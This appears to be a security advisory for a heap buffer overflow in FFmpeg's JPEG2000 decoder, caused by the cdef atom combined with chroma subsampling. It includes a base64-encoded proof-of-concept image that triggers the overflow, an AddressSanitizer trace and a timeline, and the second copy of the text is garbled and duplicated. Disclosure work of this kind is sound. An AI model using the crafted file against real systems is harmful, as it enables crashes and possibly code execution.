Summary
The vulnerability lies in the Channel Definition cdef atom of JPEG2000 which is used to define the mapping of associated components to channels. If a chroma-subsampled pixel format is used together with the cdef atom, a corner case can be triggered. For example, for a YUV420P frame with a 64x32 resolution, the Y component will be 6432+16+63=2127 bytes, and the U and V component will be 6432/2+16+63=1103 bytes. By choosing a cdef with cn=0 and asoc=2, the data for the full resolution luma component Y with a height of 32 can be written into the smaller subsampled chroma plane U with a height of 16, thus overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.
Severity
High - Allows an attacker to potentially gain remote code execution or cause denial of service.
Proof of Concept
The following base64 encoded poc.jp2 triggers the ASAN panic below:
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAAAIAAAAEAA
AwgHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAACAAIAAAACAAAAympwMmP/
T/9RAC8AAAAAAEAAAAAgAAAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAA
AQAGAgIAAf9cABYgQEhIUEhIUEhIUEhIUEhIUEhIUP+QAAoAAAAAAGcAAf+T32gQCYf/AAgH/wAI
BwAAAKHzggABuwAAp9oMC0FzRGLwAACj6gkACchYhMatzBLXAACh848AZRCkKnPzhveC/MUI/qlg
AACx+oF/UCiMWOlqioxY6WqKAAD/2Q==
ASAN panic:
==1929947==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a0000106cf at pc 0x5643c58b5858 bp 0x7fe552bfe410 sp 0x7fe552bfe408
WRITE of size 1 at 0x51a0000106cf thread T1 (av:jpeg200:df0)
#0 0x5643c58b5857 in write_frame_8 libavcodec/jpeg2000dec.c:2368:1
#1 0x5643c58b5857 in jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2389:9
#2 0x5643c51560ad in avcodec_default_execute2 libavcodec/avcodec.c:92:17
#3 0x5643c58ae7d7 in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2903:5
#4 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
#5 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
#6 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
#7 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
#8 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o
#9 0x7fe555a33b7a in start_thread nptl/pthread_create.c:448:8
#10 0x7fe555ab17b7 in __GI___clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:78
0x51a0000106cf is located 0 bytes after 1103-byte region [0x51a000010280,0x51a0000106cf)
allocated by thread T1 (av:jpeg200:df0) here:
#0 0x5643c424b70b in posix_memalign
#1 0x5643c774c426 in av_malloc libavutil/mem.c:107:9
#2 0x5643c7702fd7 in av_buffer_alloc libavutil/buffer.c:82:12
#3 0x5643c7702fd7 in av_buffer_allocz libavutil/buffer.c:95:24
#4 0x5643c7705007 in pool_alloc_buffer libavutil/buffer.c:369:26
#5 0x5643c7705007 in av_buffer_pool_get libavutil/buffer.c:407:15
#6 0x5643c5650349 in video_get_buffer libavcodec/get_buffer.c:233:23
#7 0x5643c5650349 in avcodec_default_get_buffer2 libavcodec/get_buffer.c:285:16
#8 0x5643c53b76d4 in ff_get_buffer libavcodec/decode.c:1683:11
#9 0x5643c5ca1781 in thread_get_buffer_internal libavcodec/pthread_frame.c:1041:11
#10 0x5643c5ca1781 in ff_thread_get_buffer libavcodec/pthread_frame.c:1050:15
#11 0x5643c58aceed in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2882:16
#12 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16
#13 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15
#14 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15
#15 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19
#16 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o
Thread T1 (av:jpeg200:df0) created by T0 here:
#0 0x5643c4230115 in pthread_create
#1 0x5643c40df235 in init_thread libavcodec/pthread_frame.c:912:11
#2 0x5643c40deaa8 in ff_frame_thread_init libavcodec/pthread_frame.c:971:15
#3 0x5643c5156d2f in avcodec_open2 libavcodec/avcodec.c:328:15
#4 0x5643c428e011 in dec_open fftools/ffmpeg_dec.c:1601:16
#5 0x5643c428ced0 in dec_init fftools/ffmpeg_dec.c:1666:11
#6 0x5643c4296c28 in ist_use fftools/ffmpeg_demux.c:993:15
#7 0x5643c429720b in ist_filter_add fftools/ffmpeg_demux.c:1029:11
#8 0x5643c42b0b10 in ifilter_bind_ist fftools/ffmpeg_filter.c:685:11
#9 0x5643c42b06b4 in fg_create_simple fftools/ffmpeg_filter.c:1234:11
#10 0x5643c42d704e in ost_bind_filter fftools/ffmpeg_mux_init.c:1000:15
#11 0x5643c42d1a99 in ost_add fftools/ffmpeg_mux_init.c:1536:15
#12 0x5643c42cf1e5 in map_auto_video fftools/ffmpeg_mux_init.c:1640:16
#13 0x5643c42c5b37 in create_streams fftools/ffmpeg_mux_init.c:1969:19
#14 0x5643c42c5b37 in of_open fftools/ffmpeg_mux_init.c:3335:11
#15 0x5643c42db146 in open_files fftools/ffmpeg_opt.c:1367:15
#16 0x5643c42db146 in ffmpeg_parse_options fftools/ffmpeg_opt.c:1423:11
#17 0x5643c431c06f in main fftools/ffmpeg.c:991:11
#18 0x7fe5559caca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
Timeline
Date reported: 08/04/2025
Date fixed: 08/06/2025
Date disclosed: 09/08/2025
TheOfficialFloW Finder
Summary
The vulnerability lies in the Channel Definition cdef atom of JPEG2000 which is used to define the mapping of associated components to channels. If a chroma-subsampled pixel format is used together with the cdef atom, a corner case can be triggered. For example, for a YUV420P frame with a 64x32 resolution, the Y component will be 6432+16+63=2127 bytes, and the U and V component will be 6432/2+16+63=1103 bytes. By choosing a cdef with cn=0 and asoc=2, the data for the full resolution luma component Y with a height of 32 can be written into the smaller subsampled chroma plane U with a height of 16, thus overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.
Severity
High - Allows an attacker to potentially gain remote code execution or cause denial of service.
Proof of Concept
The following base64 encoded
poc.jp2triggers the ASAN panic below:ASAN panic:
Timeline
Date reported: 08/04/2025
Date fixed: 08/06/2025
Date disclosed: 09/08/2025